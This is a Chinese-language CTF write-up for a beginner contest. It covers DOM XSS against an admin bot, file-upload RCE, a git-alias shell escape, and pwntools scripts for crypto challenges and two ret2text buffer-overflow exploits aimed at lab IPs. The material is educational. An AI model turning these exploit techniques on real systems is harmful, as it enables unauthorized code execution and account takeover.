萌新赛 WP 只写写有意思的题吧
# web
# babyjvav
https://www.tritium.work/2023/11/06/JAVA 入门的坑 /
# secchat
这里有一个插入 innerhtml 的 domxss 可以用 svg 标签或者 img 的 onerror 触发
注意到在发起聊天的时候 id 会调用这个 message 函数,就把 xss 构造进 id,发送给 admin,就能通过各种函数调用控制 admin 的行为了
# 大雪想考五百分
。。我觉得这个题低能的很
daxue =new Proxy({ | |
"math": "150", | |
"computer": new String("150"), | |
"politics": 98, | |
"english": 100, | |
"flag": 0, | |
value:500 | |
}, { | |
get:function (target, prop, receiver) { | |
if (prop === 'politics') { | |
if (target.politics !== 100) { | |
return target.politics++; | |
} else { | |
return target.politics; | |
} | |
}; | |
if(prop === "valueOf"){ | |
return function() { | |
return target.value; | |
}; | |
}; | |
if (prop === 'english') { | |
if (target.english !== 100){ | |
return "99"; | |
}else { | |
return target.english++; | |
} | |
}; | |
return Reflect.get(target, prop,receiver); | |
} | |
}); |
# 我新学的 flask
利用任意文件上传覆盖 /src/app.py, 添加一个恶意路由,就能 rce 了
# misc
# 大雪树锯结构
打 gitshell 的 考察一个很少用的点
git -c alias.test='!/readflag' test |
用 alias 引入外部命令
# 内存取证
用 vol 查看进程,dump 出 backdoor.exe, 读就行了
# 3G 之前是什么
想考信息论,但是在 ctf 环境下肯定有一种歪路
while True: | |
r = remote("172.20.14.117",53001) | |
for i in range(15): | |
print(r.recvuntil(b"Ask Shannon:\n[-] ")) | |
r.sendline(b"1") | |
r.recvuntil(b"Now open the chests:\n[-] ") | |
r.sendline(b'1 1 1 1 1 1 1') | |
res = r.recvline().decode() | |
if "You've found all the treas" in res: | |
print(res) | |
break | |
else: | |
print("next") | |
r.close() | |
continue |
一共只有 128 种情况 一定很快就会出现全 1 的
# crypto
# hard_pow
打长度扩展攻击 hashpumpy 装不明白,用了一个平替
https://github.com/shellfeel/hash-ext-attack/tree/master
# easy_pow
用 brutehash 跑出来就行了 不用脚本
https://github.com/playGitboy/bruteHASH
# easy_dhke
什么东西都泄露了 都偷过来缝进 pwntools 里
from Crypto.Util.number import * # type: ignore | |
from Crypto.Cipher import AES | |
from Crypto.Util.Padding import pad,unpad | |
import string | |
import random | |
import os | |
from pwn import * | |
# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange | |
p = 327824197795087630552811243153730025469 | |
# g is the base used for generating public keys in the Diffie-Hellman key exchange | |
g = 5 | |
# alice is Alice's private key, an integer chosen by Alice | |
alice = 22751 | |
# bob is Bob's private key, an integer chosen by Bob | |
bob = 39494 | |
# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key) | |
Bob = pow(g, bob, p) | |
# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p | |
key = long_to_bytes(pow(Bob, alice, p)) | |
def encrypt(plain_text: bytes, key: bytes) -> bytes: | |
cipher = AES.new(key, AES.MODE_ECB) | |
cipher_text = cipher.encrypt(pad(plain_text, AES.block_size)) | |
return cipher_text | |
def decrypt(encrypt_text: bytes, key: bytes) -> bytes: | |
cipher = AES.new(key, AES.MODE_ECB) | |
plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size) | |
return plain_text | |
r = remote('172.20.14.117',40766) | |
r.recvuntil(b'[+] Alice said :\n') | |
cipher = r.recvuntil(b'\n')[0:-1] | |
print(cipher) | |
message = decrypt(cipher, key) | |
print(message) | |
r.recvuntil(b"[+] Now tell me what are they talking about:") | |
r.sendline(message) | |
r.recvuntil(b"[+] Tell me the cipher:") | |
r.send(encrypt(b'HackedBy0xfa',key)) | |
print(r.recvall()) |
# easy_rsa
这个题的 n 实在简单,直接去 factordb 分解出来就能解密了
# leak_d
你都知道 d 了 直接解密不就行了
脚本好像被我删了
# pwn
# right
自己研究出来了这个,ctfwiki 上最简单的 ret2text
from pwn import * | |
context(os='linux',arch='amd64',log_level='debug') | |
r = remote("172.20.14.117",28202) | |
addr = 0x40115A | |
payload = flat([b'a'*0x28,addr]) | |
r.recvuntil(b'so please tell me what you want to tell me\n') | |
# print(payload) | |
r.sendline(payload) | |
# r.sendline(b'ls') | |
r.interactive() | |
# print(r.recvline()) |
addr 是 system 那一行的地址,rbp-20h+8 覆盖到栈顶
# onepiece
from pwn import * | |
io=remote("172.20.14.117",61768) | |
addr = 0x40119e | |
payload=b"a"*0x100+p64(addr)*0x100 | |
io.sendline(payload) | |
io.interactive() |
乱出的 我是看不明白 blindpwn